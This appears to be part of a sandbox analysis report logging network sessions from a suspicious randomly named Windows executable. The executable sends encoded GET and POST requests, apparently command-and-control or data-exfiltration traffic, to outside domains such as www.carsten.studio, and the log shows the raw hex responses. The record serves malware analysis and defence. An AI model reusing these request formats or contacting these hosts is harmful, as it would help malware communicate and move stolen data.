                                                                                                                                                Data Raw: 69 66 7a 74 3d 47 4a 56 42 79 45 71 6c 5a 58 30 2f 55 31 43 4d 6f 65 61 33 78 4b 45 4c 5a 74 69 4e 37 54 31 39 7a 69 6a 4a 66 56 75 62 6c 73 75 50 57 37 54 48 63 53 62 64 42 50 43 66 4b 41 39 73 4d 32 38 37 69 38 6c 53 31 67 63 48 4e 43 6d 51 6a 41 33 31 73 30 70 6d 63 31 6a 4b 36 48 68 35 39 49 48 65 68 4b 2b 4f 72 6a 79 44 33 58 31 41 57 34 7a 37 76 78 31 65 73 56 39 5a 50 70 6e 74 64 4e 32 31 46 63 70 44 38 42 45 6b 74 58 39 52 31 49 70 35 61 71 79 58 57 70 6e 4e 43 6d 30 52 53 63 48 45 59 77 39 75 62 5a 5a 41 69 50 34 48 77 55 31 6e 45 2b 32 32 4d 55 79 75 66 78 56 67 64 32 57 33 57 51 79 4c 51 39 47 4a 45 31 67 58 76 6f 41 2b 6b 4f 4c 70 47 31 76 71 42 63 6b 4a 66 46 49 4f 69 65 2f 6a 72 4a 65 64 77 6b 39 68 4a 79 65 71 64 47 62 48 61 44 35 54 48 48 7a 63 69 7a 34 4a 5a 6d 31 69 6b 45 64 76 4e 38 58 59 58 4c 78 47 71 72 52 56 77 43 64 50 63 33 36 71 43 73 58 30 62 73 35 71 42 38 63 6a 35 55 65 37 53 6d 6a 63 53 79 6c 33 50 47 56 58 7a 41 46 44 55 71 74 4c 65 6e 61 33 61 6d 54 51 53 4c 2f 6a 62 [TRUNCATED]
                                                                                                                                                Data Ascii: ifzt=GJVByEqlZX0/U1CMoea3xKELZtiN7T19zijJfVublsuPW7THcSbdBPCfKA9sM287i8lS1gcHNCmQjA31s0pmc1jK6Hh59IHehK+OrjyD3X1AW4z7vx1esV9ZPpntdN21FcpD8BEktX9R1Ip5aqyXWpnNCm0RScHEYw9ubZZAiP4HwU1nE+22MUyufxVgd2W3WQyLQ9GJE1gXvoA+kOLpG1vqBckJfFIOie/jrJedwk9hJyeqdGbHaD5THHzciz4JZm1ikEdvN8XYXLxGqrRVwCdPc36qCsX0bs5qB8cj5Ue7SmjcSyl3PGVXzAFDUqtLena3amTQSL/jbMWC9Lh4432GRY4H7M9wEpmdA22rOQEQXkhdGFnKOFbNhCyo6y0YRvXnAchd+olNi8qcMPwY1A05GIWKW8aK6u1y046WFMBL6nLvWPltP5MKaWnOYZeQpvnaU3sdwOKWWCepYs94TwIVjmvzEF2AR3SU+q+ptB1SeX0FiBwqmPaZkNNmB+UxH6glmbS1K5+M+qxD/5qGaT6nCqVeWqSQFyluzkqBypEI9P3qWyYuz9vrG+bK3uX4obgcUVZ9uJXaiQGihx6EPv14vTxgqzTAnVz9mEd8JQ7RgLm2dHRQTF8Z/pFHWzpCg8DRoI1VwLI/ccuzbx3TYmmzAHRgnWZAOp2uQ4fONOgfYbfr56TO4YyjPDH1kfEc65a6ivcCxn4i/f3Hgg7LQ1TOd0rS5TNK2tRWAfDw4IHmz6VroDZZL19vWikJ8V19J+bCvs7+lM8p4TanUyf2jUyj/ia5//dBusjozU3UMgeU38IaxI2JHF0QuIZ5VpIhEWCLXnmlqhU6gGUJPo6eN9xkKToJG0c96cL1JFaS2tO0DCGl8tBXr3tG5eXjWavBB6oa2H8nKADMtE2d6GNigDmT+VoJJO+/I15lQ2qx5cTTjPaIOeBOiW1A8w/vdDYtJK7v4n25qE0lhn7xX3DYM1lX4T1MIkdoc85F8KYRO84UthV [TRUNCATED]


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                44192.168.2.450051163.44.185.183803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:45:28.870351076 CET523OUTGET /9k5s/?ifzt=LL9hxxOEAXNrd1/9gf6rhKwJTveb5Fl2+AbaSF/ioM6ycsHwCgOlWdWUKzBQGlsNiYd2kWB7LHmLrDvgpCIhDnf37DhA8cnF96i4zyTZqkB+X7XYpxBXm1Q=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.sankan-fukushi.info
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:45:30.299025059 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:30 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 19268
                                                                                                                                                Connection: close
                                                                                                                                                Server: Apache
                                                                                                                                                Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:45:30.299062967 CET404INData Raw: 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a
                                                                                                                                                Data Ascii: line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack: center; jus
                                                                                                                                                Nov 25, 2024 09:45:30.299082994 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 34 30
                                                                                                                                                Data Ascii: -ms-flex-wrap: wrap; flex-wrap: wrap; max-width: 640px; margin: 20px auto; } @media screen and (min-width: 640px) { .lol-error-page__information { -webkit-flex-wrap: nowrap;
                                                                                                                                                Nov 25, 2024 09:45:30.299096107 CET1236INData Raw: 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 38 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 63 61 6c 63 28
                                                                                                                                                Data Ascii: position: absolute; z-index: 1; bottom: -8px; left: calc(50% - 10px); display: block; width: 0; content: ''; border-width: 10px 8px 0; border-style: solid; border-color:
                                                                                                                                                Nov 25, 2024 09:45:30.299107075 CET448INData Raw: 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c
                                                                                                                                                Data Ascii: margin: auto; } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal { display: inline; float: left; } } .lol-error-page__ad-banner-holizontal-right {
                                                                                                                                                Nov 25, 2024 09:45:30.299118042 CET1236INData Raw: 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 2f 2f 20 e3 82 b3 e3 83 94 e3 83 bc e3 83 a9 e3 82 a4 e3 83 88 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 73 65 74 43 6f 70 79 72 69 67 68 74 73 20 28 29 20 7b 0a 20 20 20 20 09
                                                                                                                                                Data Ascii: "text/javascript"> // function setCopyrights () { document.write('copyright(c)2001-' + ' <a href="https://pepabo.com/" target="_blank">GMO</a> all rights reserved'); } </script><
                                                                                                                                                Nov 25, 2024 09:45:30.299141884 CET1236INData Raw: 37 34 2d 32 31 2e 34 33 31 2d 31 31 2e 32 35 33 20 30 2d 31 39 2e 39 33 33 20 33 2e 32 38 31 2d 32 35 2e 38 35 39 20 39 2e 39 2d 32 2e 37 32 37 20 33 2e 31 35 32 2d 34 2e 37 36 36 20 36 2e 38 33 39 2d 35 2e 39 38 36 20 31 30 2e 38 32 34 2e 33 30
                                                                                                                                                Data Ascii: 74-21.431-11.253 0-19.933 3.281-25.859 9.9-2.727 3.152-4.766 6.839-5.986 10.824.308-4.858 1.955-9.536 4.759-13.515z"/><path fill="#fff" d="M23.693 42.593h-.4c-2.993.166-4.34 1.505-3.966 8.293-.007 2.101.415 4.181 1.238 6.114.696 1.315 2.18 2.0
                                                                                                                                                Nov 25, 2024 09:45:30.299154997 CET1236INData Raw: 39 2d 37 2e 33 36 2d 2e 33 30 34 2d 2e 36 37 2d 2e 39 38 36 2d 31 2e 30 38 38 2d 31 2e 37 32 31 2d 31 2e 30 35 34 2d 31 34 2e 34 2e 36 39 32 2d 32 38 2e 32 35 33 2d 33 2e 35 36 37 2d 33 33 2e 37 31 35 2d 31 30 2e 33 32 35 2d 2e 35 37 2d 2e 37 30
                                                                                                                                                Data Ascii: 9-7.36-.304-.67-.986-1.088-1.721-1.054-14.4.692-28.253-3.567-33.715-10.325-.57-.708-1.58-.876-2.349-.391-6.87 4.196-11.795 10.946-13.693 18.769-.787-.194-1.6-.266-2.409-.211-8.006.467-7.482 8.624-7.333 12.04-.001 2.658.581 5.283 1.706 7.691 1.
                                                                                                                                                Nov 25, 2024 09:45:30.299166918 CET1236INData Raw: 63 2d 2e 30 31 31 20 32 2e 30 39 38 2d 2e 34 34 39 20 34 2e 31 37 32 2d 31 2e 32 38 37 20 36 2e 30 39 35 2d 2e 37 31 38 20 31 2e 32 38 39 2d 32 2e 31 39 35 20 31 2e 39 35 36 2d 33 2e 36 33 36 20 31 2e 36 34 31 2d 2e 36 34 37 2e 30 33 37 2d 31 2e
                                                                                                                                                Data Ascii: c-.011 2.098-.449 4.172-1.287 6.095-.718 1.289-2.195 1.956-3.636 1.641-.647.037-1.286-.161-1.8-.557v-.075c1.028-3.526 1.556-7.178 1.571-10.851.003-1.479-.08-2.956-.25-4.425.355-.125.731-.181 1.107-.166h.449c1.474-.126 2.856.731 3.4 2.107.57 2.
                                                                                                                                                Nov 25, 2024 09:45:30.299173117 CET1236INData Raw: 2d 31 2e 36 30 32 20 31 2e 30 39 35 6c 2d 2e 30 31 33 2e 30 36 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 35 36 2e 33 39 20 36 34 2e 39 37 33 6c 2d 34 2e 31 31 35 20 31 2e 34 36 2d 34 2e 31 31 35 2d 31 2e 35 22
                                                                                                                                                Data Ascii: -1.602 1.095l-.013.06z"/><path fill="#fff" d="M56.39 64.973l-4.115 1.46-4.115-1.5"/><path fill="#f60" d="M52.26 68.239c-.209.001-.417-.035-.614-.105l-4.115-1.5c-.917-.361-1.38-1.387-1.043-2.313.337-.926 1.351-1.416 2.285-1.103l3.5 1.279 3.517-
                                                                                                                                                Nov 25, 2024 09:45:30.419013023 CET1236INData Raw: 32 33 2d 31 2e 37 32 34 6c 2d 2e 34 34 32 2d 2e 37 33 36 2d 2e 32 31 34 2d 2e 33 36 35 2d 2e 34 33 31 2d 2e 37 34 38 63 2d 31 2e 32 39 39 2d 32 2e 33 36 37 2d 32 2e 34 31 36 2d 34 2e 38 33 2d 33 2e 33 34 32 2d 37 2e 33 36 36 2d 31 2e 38 37 36 2d
                                                                                                                                                Data Ascii: 23-1.724l-.442-.736-.214-.365-.431-.748c-1.299-2.367-2.416-4.83-3.342-7.366-1.876-5.242-3.133-10.686-3.746-16.22l1.927-.47 2.274 5.9c.088.224.271.396.5.47l.241.038c.153 0 .302-.044.43-.128l10.472-6.891 3.85-2.511 3.917 2.608 10.428 6.984c.129.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                45192.168.2.450052217.160.0.200803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:45:36.356439114 CET786OUTPOST /lnel/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.carsten.studio
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.carsten.studio
                                                                                                                                                Referer: http://www.carsten.studio/lnel/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 63 67 7a 49 35 72 37 66 72 7a 38 4b 31 56 32 35 36 45 6f 68 62 53 59 7a 55 52 6f 6d 45 35 6e 61 6f 6b 6f 78 52 46 4f 55 63 61 42 33 44 50 38 73 2f 73 69 41 55 77 73 45 48 70 6f 32 58 49 48 67 55 53 62 74 39 65 32 4d 6b 58 54 6f 77 79 55 68 41 2f 68 4d 4d 71 78 7a 6a 54 56 52 38 6f 71 73 6f 54 43 6d 41 70 61 7a 71 4e 6b 62 51 7a 4c 4f 59 61 48 72 70 44 79 53 59 30 39 70 58 55 77 50 41 32 70 48 70 7a 38 65 32 68 33 4f 33 30 59 68 33 46 6e 52 4d 59 52 6d 4c 62 6e 4e 64 74 73 46 4b 4f 2f 61 53 38 52 51 55 5a 56 5a 4b 64 69 72 30 4e 54 67 4f 64 78 59 39 63 45 62 75 30 52 55 75 51 3d 3d
                                                                                                                                                Data Ascii: ifzt=cgzI5r7frz8K1V256EohbSYzURomE5naokoxRFOUcaB3DP8s/siAUwsEHpo2XIHgUSbt9e2MkXTowyUhA/hMMqxzjTVR8oqsoTCmApazqNkbQzLOYaHrpDySY09pXUwPA2pHpz8e2h3O30Yh3FnRMYRmLbnNdtsFKO/aS8RQUZVZKdir0NTgOdxY9cEbu0RUuQ==
                                                                                                                                                Nov 25, 2024 09:45:37.664650917 CET1236INHTTP/1.1 200 OK
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:37 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                                                                                Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:45:37.664778948 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                                                                                Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                46192.168.2.450053217.160.0.200803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:45:39.011440039 CET806OUTPOST /lnel/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.carsten.studio
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.carsten.studio
                                                                                                                                                Referer: http://www.carsten.studio/lnel/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 63 67 7a 49 35 72 37 66 72 7a 38 4b 32 30 47 35 34 6e 77 68 64 79 59 30 4a 68 6f 6d 4f 5a 6e 57 6f 6b 6b 78 52 48 69 45 63 6f 56 33 4e 4d 6f 73 2b 74 69 41 56 77 73 45 4e 4a 6f 7a 54 49 48 6e 55 53 48 66 39 62 65 4d 6b 58 48 6f 77 33 77 68 41 4f 68 4c 4e 36 78 78 6c 54 56 54 68 59 71 73 6f 54 43 6d 41 70 4f 56 71 4f 55 62 51 48 50 4f 5a 37 48 73 33 54 79 54 66 30 39 70 54 55 77 4c 41 32 70 35 70 33 31 31 32 69 44 4f 33 77 63 68 33 55 6e 53 58 6f 52 67 46 37 6d 34 4c 73 4d 49 54 74 57 6b 61 4e 30 31 62 36 70 50 47 37 76 78 6c 38 79 33 63 64 56 72 67 62 4e 76 6a 33 73 64 31 55 64 55 49 71 56 33 6c 42 51 66 36 49 77 64 34 38 7a 52 78 45 77 3d
                                                                                                                                                Data Ascii: ifzt=cgzI5r7frz8K20G54nwhdyY0JhomOZnWokkxRHiEcoV3NMos+tiAVwsENJozTIHnUSHf9beMkXHow3whAOhLN6xxlTVThYqsoTCmApOVqOUbQHPOZ7Hs3TyTf09pTUwLA2p5p3112iDO3wch3UnSXoRgF7m4LsMITtWkaN01b6pPG7vxl8y3cdVrgbNvj3sd1UdUIqV3lBQf6Iwd48zRxEw=
                                                                                                                                                Nov 25, 2024 09:45:40.365125895 CET1236INHTTP/1.1 200 OK
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:40 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                                                                                Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:45:40.365235090 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                                                                                Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                47192.168.2.450054217.160.0.200803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:45:41.680648088 CET10888OUTPOST /lnel/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.carsten.studio
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.carsten.studio
                                                                                                                                                Referer: http://www.carsten.studio/lnel/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 63 67 7a 49 35 72 37 66 72 7a 38 4b 32 30 47 35 34 6e 77 68 64 79 59 30 4a 68 6f 6d 4f 5a 6e 57 6f 6b 6b 78 52 48 69 45 63 6f 4e 33 4e 2b 77 73 2f 4f 4b 41 54 41 73 45 4c 35 6f 79 54 49 48 36 55 53 4f 57 39 62 53 6d 6b 55 2f 6f 78 52 73 68 4c 61 4e 4c 45 36 78 78 70 7a 56 65 38 6f 71 35 6f 53 79 71 41 70 65 56 71 4f 55 62 51 42 6a 4f 51 4b 48 73 31 54 79 53 59 30 39 31 58 55 77 6e 41 32 52 32 70 33 35 44 32 55 7a 4f 35 77 4d 68 77 6d 2f 53 62 6f 52 69 51 37 6d 67 4c 73 42 49 54 74 4c 56 61 4e 42 65 62 39 42 50 47 2b 57 31 34 4e 57 75 46 65 31 59 38 59 68 52 67 52 73 47 36 47 6c 44 5a 71 78 74 37 68 4d 48 37 36 70 61 6e 5a 72 52 71 6a 52 73 52 54 44 54 30 44 7a 43 41 76 66 74 4c 4e 39 6c 6c 50 77 30 67 74 59 57 6a 67 4d 78 7a 31 35 36 32 61 75 4e 77 35 32 4c 72 78 55 35 72 79 2f 56 53 75 51 38 61 62 76 38 41 76 2b 37 32 38 73 65 4a 4f 31 63 4a 77 72 33 70 42 5a 30 36 50 71 4d 4c 67 5a 53 79 36 55 74 6f 57 2b 45 52 79 41 68 4e 71 6b 44 59 